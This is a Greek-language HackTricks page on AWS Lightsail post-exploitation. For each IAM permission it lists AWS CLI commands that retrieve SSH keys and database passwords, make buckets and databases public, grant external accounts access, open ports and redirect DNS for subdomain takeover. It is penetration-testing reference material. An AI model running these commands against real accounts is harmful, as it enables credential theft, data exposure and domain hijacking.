AWS - Lightsail Privesc

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Lightsail

Για περισσότερες πληροφορίες σχετικά με το Lightsail, ελέγξτε:

AWS - Lightsail Enum

Σημαντικό είναι να σημειωθεί ότι το Lightsail δεν χρησιμοποιεί ρόλους IAM που ανήκουν στον χρήστη αλλά σε ένα διαχειριζόμενο λογαριασμό AWS, οπότε δεν μπορείτε να καταχραστείτε αυτήν την υπηρεσία για ανέβασμα δικαιωμάτων. Ωστόσο, ευαίσθητα δεδομένα όπως κώδικας, κλειδιά API και πληροφορίες βάσης δεδομένων μπορεί να βρεθούν σε αυτήν την υπηρεσία.

lightsail:DownloadDefaultKeyPair

Αυτή η άδεια θα σας επιτρέψει να λάβετε τα κλειδιά SSH για πρόσβαση στις περιπτώσεις:

aws lightsail download-default-key-pair

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις περιπτώσεις.

lightsail:GetInstanceAccessDetails

Αυτή η άδεια θα σας επιτρέψει να δημιουργήσετε κλειδιά SSH για να αποκτήσετε πρόσβαση στις περιπτώσεις:

aws lightsail get-instance-access-details --instance-name <instance_name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις περιπτώσεις.

lightsail:CreateBucketAccessKey

Αυτή η άδεια θα σας επιτρέψει να λάβετε ένα κλειδί για να αποκτήσετε πρόσβαση στο κάδο:

aws lightsail create-bucket-access-key --bucket-name <name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στον κάδο.

lightsail:GetRelationalDatabaseMasterUserPassword

Αυτή η άδεια θα σας επιτρέψει να λάβετε τα διαπιστευτήρια για να αποκτήσετε πρόσβαση στη βάση δεδομένων:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στη βάση δεδομένων.

lightsail:UpdateRelationalDatabase

Αυτή η άδεια θα σας επιτρέψει να αλλάξετε τον κωδικό πρόσβασης για πρόσβαση στη βάση δεδομένων:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Εάν η βάση δεδομένων δεν είναι δημόσια, μπορείτε επίσης να την καταστήσετε δημόσια με αυτές τις άδειες με

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Πιθανές Επιπτώσεις: Εύρεση ευαίσθητων πληροφοριών μέσα στη βάση δεδομένων.

lightsail:OpenInstancePublicPorts

Αυτή η άδεια επιτρέπει το άνοιγμα θυρών προς το Διαδίκτυο.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Πιθανή Επίδραση: Πρόσβαση σε ευαίσθητες θύρες.

lightsail:PutInstancePublicPorts

Αυτή η άδεια επιτρέπει το άνοιγμα θυρών προς το Διαδίκτυο. Σημειώστε ότι η κλήση θα κλείσει οποιαδήποτε θύρα που δεν έχει καθοριστεί σε αυτήν.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητες θύρες.

lightsail:SetResourceAccessForBucket

Αυτές οι άδειες επιτρέπουν την παροχή πρόσβασης σε ένα instance σε ένα bucket χωρίς καμία επιπλέον διαπιστευτήρια

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Πιθανές Επιπτώσεις: Πιθανή νέα πρόσβαση σε κάδους με ευαίσθητες πληροφορίες.

lightsail:UpdateBucket

Με αυτήν την άδεια, ένας επιτιθέμενος μπορεί να χορηγήσει στον δικό του λογαριασμό AWS πρόσβαση για ανάγνωση σε κάδους ή ακόμα και να καταστήσει τους κάδους δημόσιους για όλους:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Πιθανή Επίδραση: Πιθανή νέα πρόσβαση σε κάδους με ευαίσθητες πληροφορίες.

lightsail:UpdateContainerService

Με αυτές τις άδειες, ένας επιτιθέμενος μπορεί να χορηγήσει πρόσβαση σε ιδιωτικά ECRs από την υπηρεσία containers.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Πιθανές Επιπτώσεις: Απόκτηση ευαίσθητων πληροφοριών από ιδιωτικό ECR

lightsail:CreateDomainEntry

Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να δημιουργήσει υποτομέα και να τον κατευθύνει στη δική του διεύθυνση IP (subdomain takeover), ή να δημιουργήσει ένα SPF record που του επιτρέπει να παραποιήσει emails από τον τομέα, ή ακόμα και να ορίσει τον κύριο τομέα στη δική του διεύθυνση IP.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Πιθανές Επιπτώσεις: Απόκτηση ελέγχου ενός τομέα

lightsail:UpdateDomainEntry

Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να δημιουργήσει έναν υποτομέα και να τον κατευθύνει προς τη δική του διεύθυνση IP (subdomain takeover), ή να δημιουργήσει έναν SPF εγγραφή που του επιτρέπει να πλαστογραφεί emails από τον τομέα, ή ακόμα και να ορίσει τον κύριο τομέα στη δική του διεύθυνση IP.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Πιθανές Επιπτώσεις: Απόκτηση ελέγχου ενός τομέα

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated